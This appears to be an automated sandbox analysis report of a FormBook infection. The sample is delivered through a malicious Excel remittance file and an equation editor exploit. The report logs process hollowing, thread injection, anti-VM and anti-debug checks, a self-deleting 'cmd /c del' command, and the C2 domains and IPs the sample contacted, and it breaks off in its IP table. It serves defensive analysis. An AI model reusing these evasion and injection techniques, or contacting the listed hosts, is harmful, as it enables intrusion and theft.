Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFD8C NtDelayExecution,LdrInitializeThunk, 11_2_00BAFD8C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_00BAFDC0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_00BAFED0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFFB4 NtCreateSection,LdrInitializeThunk, 11_2_00BAFFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB10D0 NtOpenProcessToken, 11_2_00BB10D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0078 NtResumeThread, 11_2_00BB0078
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0060 NtQuerySection, 11_2_00BB0060
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0048 NtProtectVirtualMemory, 11_2_00BB0048
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB01D4 NtSetValueKey, 11_2_00BB01D4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB010C NtOpenDirectoryObject, 11_2_00BB010C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1148 NtOpenThread, 11_2_00BB1148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF8CC NtWaitForSingleObject, 11_2_00BAF8CC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF938 NtWriteFile, 11_2_00BAF938
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1930 NtSetContextThread, 11_2_00BB1930
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFA20 NtQueryInformationFile, 11_2_00BAFA20
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFA50 NtEnumerateValueKey, 11_2_00BAFA50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFBE8 NtQueryVirtualMemory, 11_2_00BAFBE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC90 NtUnmapViewOfSection, 11_2_00BAFC90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC30 NtOpenProcess, 11_2_00BAFC30
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC48 NtSetInformationFile, 11_2_00BAFC48
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB0C40 NtGetContextThread, 11_2_00BB0C40
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB1D80 NtSuspendThread, 11_2_00BB1D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFD5C NtEnumerateKey, 11_2_00BAFD5C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFEA0 NtReadVirtualMemory, 11_2_00BAFEA0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFE24 NtWriteVirtualMemory, 11_2_00BAFE24
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFFFC NtCreateProcessEx, 11_2_00BAFFFC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFF34 NtQueueApcThread, 11_2_00BAFF34
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F81D0 NtCreateFile, 11_2_000F81D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8280 NtReadFile, 11_2_000F8280
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8300 NtClose, 11_2_000F8300
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F83B0 NtAllocateVirtualMemory, 11_2_000F83B0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F8222 NtCreateFile, 11_2_000F8222
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F83AA NtAllocateVirtualMemory, 11_2_000F83AA
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Remittance_Advice_details001009142021.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Remittance_Advice_details001009142021.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/21@6/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E41450
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 8_2_00E41450
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E41450
Source: explorer.exe, 0000000A.00000000.497685045.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, wuapp.exe
Source: Binary string: wuapp.pdb source: vbc.exe, 00000008.00000002.521643579.0000000000839000.00000004.00000020.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43BC5 push ecx; ret 6_2_00E43BD8
Source: C:\Users\Public\vbc.exe Code function: 8_2_004062F6 pushfd ; ret 8_2_004062F7
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B3C5 push eax; ret 8_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 8_2_004153FC push eax; retf 8_2_0041540B
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B47C push eax; ret 8_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B412 push eax; ret 8_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B41B push eax; ret 8_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415CE7 pushad ; ret 8_2_00415D4B
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041C4EE push 133511A3h; retf 8_2_0041C4F3
Source: C:\Users\Public\vbc.exe Code function: 8_2_00414D71 push ss; iretd 8_2_00414D72
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415D38 pushad ; ret 8_2_00415D4B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E43BC5 push ecx; ret 8_2_00E43BD8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBDFA1 push ecx; ret 11_2_00BBDFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E62F6 pushfd ; ret 11_2_000E62F7
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB3C5 push eax; ret 11_2_000FB418
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F53FC push eax; retf 11_2_000F540B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB41B push eax; ret 11_2_000FB482
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB412 push eax; ret 11_2_000FB418
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB47C push eax; ret 11_2_000FB482
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FC4EE push 133511A3h; retf 11_2_000FC4F3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F5CE7 pushad ; ret 11_2_000F5D4B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F5D38 pushad ; ret 11_2_000F5D4B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F4D71 push ss; iretd 11_2_000F4D72

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E41450

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43005 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00E43005
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 00000000000E85F4 second address: 00000000000E85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 00000000000E898E second address: 00000000000E8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1348 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe TID: 1936 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088C0 rdtsc 8_2_004088C0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.500231704.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.500231704.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.500194477.000000000456F000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 0000000A.00000000.508832469.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.495394562.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.492175209.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44EDA _memset,IsDebuggerPresent, 6_2_00E44EDA
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E45B05 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_00E45B05
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E410B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E410B0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088C0 rdtsc 8_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_001306DA mov eax, dword ptr fs:[00000030h] 6_2_001306DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00130A1C mov eax, dword ptr fs:[00000030h] 6_2_00130A1C
Source: C:\Users\Public\vbc.exe Code function: 6_2_001308EE mov eax, dword ptr fs:[00000030h] 6_2_001308EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0013099F mov eax, dword ptr fs:[00000030h] 6_2_0013099F
Source: C:\Users\Public\vbc.exe Code function: 6_2_001309DE mov eax, dword ptr fs:[00000030h] 6_2_001309DE
Source: C:\Users\Public\vbc.exe Code function: 8_2_009426F8 mov eax, dword ptr fs:[00000030h] 8_2_009426F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC26F8 mov eax, dword ptr fs:[00000030h] 11_2_00BC26F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 8_2_00409B30 LdrLoadDll, 8_2_00409B30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44131 SetUnhandledExceptionFilter, 6_2_00E44131
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44162 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00E44162
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E44162 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00E44162
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E44131 SetUnhandledExceptionFilter, 8_2_00E44131

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.51 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.matcitekids.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.248.20 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.garimpeirastore.online
Source: C:\Windows\explorer.exe Domain query: www.doityourselfism.com
Source: C:\Windows\explorer.exe Network Connect: 169.62.91.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.onedadtwodudes.com
Source: C:\Windows\explorer.exe Domain query: www.ecofingers.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 1160000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E474FC cpuid 6_2_00E474FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43A39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00E43A39

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483680 Sample: Remittance_Advice_details00... Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 39 www.builtbydawn.com 2->39 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 13 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 40 2->16         started        signatures3 process4 dnsIp5 47 107.173.219.122, 49167, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\...\loader1[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 ~$Remittance_Advic...ls001009142021.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Maps a DLL or memory area into another process 18->53 55 Tries to detect virtualization through RDTSC time measurements 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 matcitekids.com 50.87.248.20, 49171, 80 UNIFIEDLAYER-AS-1US United States 24->41 43 www.doityourselfism.com 169.62.91.142, 49170, 80 SOFTLAYERUS United States 24->43 45 4 other IPs or domains 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wuapp.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.58.78.16
 www.ecofingers.com United States
16509 AMAZON-02US true
209.99.64.51
 www.onedadtwodudes.com United States
